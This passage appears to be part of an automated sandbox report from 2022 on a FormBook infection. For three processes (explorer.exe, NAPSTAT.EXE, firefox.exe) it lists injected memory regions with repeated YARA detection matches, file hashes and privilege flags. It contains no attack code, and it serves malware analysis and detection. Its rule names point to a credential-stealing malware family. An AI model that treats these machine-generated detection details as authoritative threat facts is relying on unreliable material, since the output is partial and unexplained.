                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation: moderate

                                                  Target ID: 10
                                                  Start time: 12:07:39
                                                  Start date: 08/08/2022
                                                  Path: C:\Windows\explorer.exe
                                                  Wow64 process (32bit): false
                                                  Commandline: C:\Windows\Explorer.EXE
                                                  Imagebase: 0xff040000
                                                  File size: 3229696 bytes
                                                  MD5 hash: 38AE1B3C38FAEF56FE4907922F0385BA
                                                  Has elevated privileges: true
                                                  Has administrator privileges: true
                                                  Programmed in: C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation: high

                                                  Target ID: 11
                                                  Start time: 12:08:19
                                                  Start date: 08/08/2022
                                                  Path: C:\Windows\SysWOW64\NAPSTAT.EXE
                                                  Wow64 process (32bit): true
                                                  Commandline: C:\Windows\SysWOW64\NAPSTAT.EXE
                                                  Imagebase: 0xa00000
                                                  File size: 279552 bytes
                                                  MD5 hash: 4AF92E1821D96E4178732FC04D8FD69C
                                                  Has elevated privileges: true
                                                  Has administrator privileges: true
                                                  Programmed in: C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation: moderate

                                                  Target ID: 13
                                                  Start time: 12:09:10
                                                  Start date: 08/08/2022
                                                  Path: C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                                  Wow64 process (32bit): true
                                                  Commandline: C:\Program Files (x86)\Mozilla Firefox\Firefox.exe
                                                  Imagebase: 0x190000
                                                  File size: 517064 bytes
                                                  MD5 hash: C2D924CE9EA2EE3E7B7E6A7C476619CA
                                                  Has elevated privileges: true
                                                  Has administrator privileges: true
                                                  Programmed in: C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation: moderate

                                                  No disassembly